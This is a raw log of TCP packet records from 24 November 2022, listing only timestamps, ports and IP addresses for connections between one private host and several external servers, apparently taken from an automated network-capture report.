Nov 24, 2022 12:20:03.620568991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620594025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620614052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620620966 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620646000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620649099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620671988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620678902 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620702028 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620723009 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.637634993 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.637739897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.637773991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.637797117 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.637816906 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.637849092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.637871981 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.637871027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.637900114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.637929916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.637929916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.637958050 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.637984037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.637995005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.637995005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638012886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638025999 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638041019 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638067961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638371944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638400078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638420105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638444901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638464928 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638473034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638500929 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638535976 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638536930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638547897 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638557911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638576984 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638577938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638597965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638600111 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638624907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638636112 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638654947 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638663054 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638678074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638681889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638700008 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638719082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638734102 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638746023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638765097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638775110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638787031 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638803959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638827085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638834000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638853073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638871908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638900042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638916016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638916969 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638946056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.638950109 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638972998 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.638973951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639003038 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639003038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639017105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639031887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639048100 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639053106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639072895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639075994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639091015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639098883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639112949 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639113903 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639137983 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639142036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639163971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639169931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639190912 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639198065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639204979 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639228106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639255047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639271021 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639275074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639297962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639307022 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639326096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639344931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639354944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639378071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639381886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639408112 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639408112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639425039 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639426947 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639446020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639450073 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639468908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639475107 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639496088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639498949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639514923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639527082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639549971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639559031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639588118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639609098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639616966 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639641047 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639647007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639672041 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639678001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639693975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639700890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639717102 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639719963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639743090 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639745951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639764071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639766932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639786005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639786959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639806032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639808893 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639826059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639827967 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639849901 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639852047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639868975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639879942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639893055 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639906883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639930964 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639938116 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639964104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639986038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.639986992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.639986992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640012026 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640013933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640034914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640041113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640049934 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640070915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640090942 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640099049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640109062 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640127897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640151978 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640156984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640182972 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640186071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640209913 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640214920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640232086 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640240908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640273094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640302896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640305042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640331030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640345097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640357971 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640374899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640386105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640405893 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640414000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640444040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640444994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640469074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640470982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640477896 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640499115 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640526056 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640527964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640544891 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640557051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640566111 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640585899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640608072 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640614986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640646935 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640646935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.640657902 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.640687943 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642002106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642038107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642066956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642090082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642110109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642128944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642144918 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642155886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642187119 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642210960 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642211914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642241001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642250061 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642271996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642280102 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642321110 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642342091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642366886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642385960 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642390966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642440081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642443895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642473936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642494917 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642503977 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642532110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642534018 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642554045 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642560959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642580986 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642590046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642610073 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642618895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642632961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642647982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642678022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642679930 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642708063 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642719030 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642735004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642740011 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642761946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642765045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.642791033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.642900944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.655002117 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.655052900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.655083895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.655113935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.655144930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.655210018 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.655606031 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:12.230549097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:12.248507977 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:12.249903917 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:12.312158108 CET	49711	443	192.168.2.3	185.47.40.36
Nov 24, 2022 12:20:12.312222004 CET	443	49711	185.47.40.36	192.168.2.3
Nov 24, 2022 12:20:12.312320948 CET	49711	443	192.168.2.3	185.47.40.36
Nov 24, 2022 12:20:12.359165907 CET	49711	443	192.168.2.3	185.47.40.36
Nov 24, 2022 12:20:12.359225988 CET	443	49711	185.47.40.36	192.168.2.3
Nov 24, 2022 12:20:12.470132113 CET	443	49711	185.47.40.36	192.168.2.3
Nov 24, 2022 12:20:12.470227003 CET	49711	443	192.168.2.3	185.47.40.36
Nov 24, 2022 12:20:12.473649025 CET	49711	443	192.168.2.3	185.47.40.36
Nov 24, 2022 12:20:12.473680973 CET	443	49711	185.47.40.36	192.168.2.3
Nov 24, 2022 12:20:12.474111080 CET	443	49711	185.47.40.36	192.168.2.3
Nov 24, 2022 12:20:12.571213961 CET	49711	443	192.168.2.3	185.47.40.36
Nov 24, 2022 12:20:13.032147884 CET	49711	443	192.168.2.3	185.47.40.36
Nov 24, 2022 12:20:13.032183886 CET	443	49711	185.47.40.36	192.168.2.3
Nov 24, 2022 12:20:13.081115961 CET	443	49711	185.47.40.36	192.168.2.3
Nov 24, 2022 12:20:13.081228018 CET	443	49711	185.47.40.36	192.168.2.3
Nov 24, 2022 12:20:13.081288099 CET	49711	443	192.168.2.3	185.47.40.36
Nov 24, 2022 12:20:13.085244894 CET	49711	443	192.168.2.3	185.47.40.36
Nov 24, 2022 12:20:13.092473030 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:20:13.170247078 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:20:13.215465069 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:20:13.215940952 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:20:13.245480061 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:20:13.270472050 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:20:13.271330118 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:20:13.300916910 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:20:13.322575092 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:20:13.383965969 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:20:13.437524080 CET	49709	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:13.437788010 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:20:41.421819925 CET	49712	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:41.421900034 CET	443	49712	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:41.421998024 CET	49712	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:41.494704008 CET	49712	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:41.494750023 CET	443	49712	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:41.550939083 CET	443	49712	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:41.551160097 CET	49712	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:44.863918066 CET	49712	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:44.863945007 CET	443	49712	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:44.864391088 CET	443	49712	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:44.864470959 CET	49712	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:44.878554106 CET	49712	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:44.878602028 CET	443	49712	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:45.082406998 CET	443	49712	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:45.082536936 CET	443	49712	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:45.082650900 CET	49712	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:45.082650900 CET	49712	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:45.084868908 CET	49712	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:45.084912062 CET	443	49712	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:46.860666037 CET	49713	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:46.860728025 CET	443	49713	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:46.861745119 CET	49713	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:46.862102985 CET	49713	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:46.862112999 CET	443	49713	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:46.862756014 CET	443	49713	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:46.888614893 CET	49714	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:46.888684988 CET	443	49714	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:46.888809919 CET	49714	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:46.901716948 CET	49714	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:46.901762962 CET	443	49714	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:46.945590973 CET	443	49714	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:46.945802927 CET	49714	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:46.949027061 CET	49714	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:46.949048996 CET	443	49714	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:46.962543011 CET	49714	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:46.962564945 CET	443	49714	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.058856010 CET	443	49714	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.058968067 CET	443	49714	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.065450907 CET	49715	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:47.065454006 CET	49714	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.065489054 CET	443	49715	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:47.065828085 CET	49715	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:47.066956997 CET	49715	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:47.066971064 CET	443	49715	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:47.067028999 CET	443	49715	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:47.083368063 CET	49714	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.083408117 CET	443	49714	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.184242010 CET	49716	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:47.184299946 CET	443	49716	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:47.184525967 CET	49716	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:47.185003996 CET	49716	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:47.185039043 CET	443	49716	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:47.185089111 CET	443	49716	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:47.241524935 CET	49717	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.241589069 CET	443	49717	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.241677046 CET	49717	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.243881941 CET	49717	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.243920088 CET	443	49717	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.325115919 CET	49718	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:47.325179100 CET	443	49718	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:47.325304985 CET	49718	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:47.325623035 CET	49718	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:47.325654030 CET	443	49718	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:47.325743914 CET	443	49718	51.195.77.208	192.168.2.3
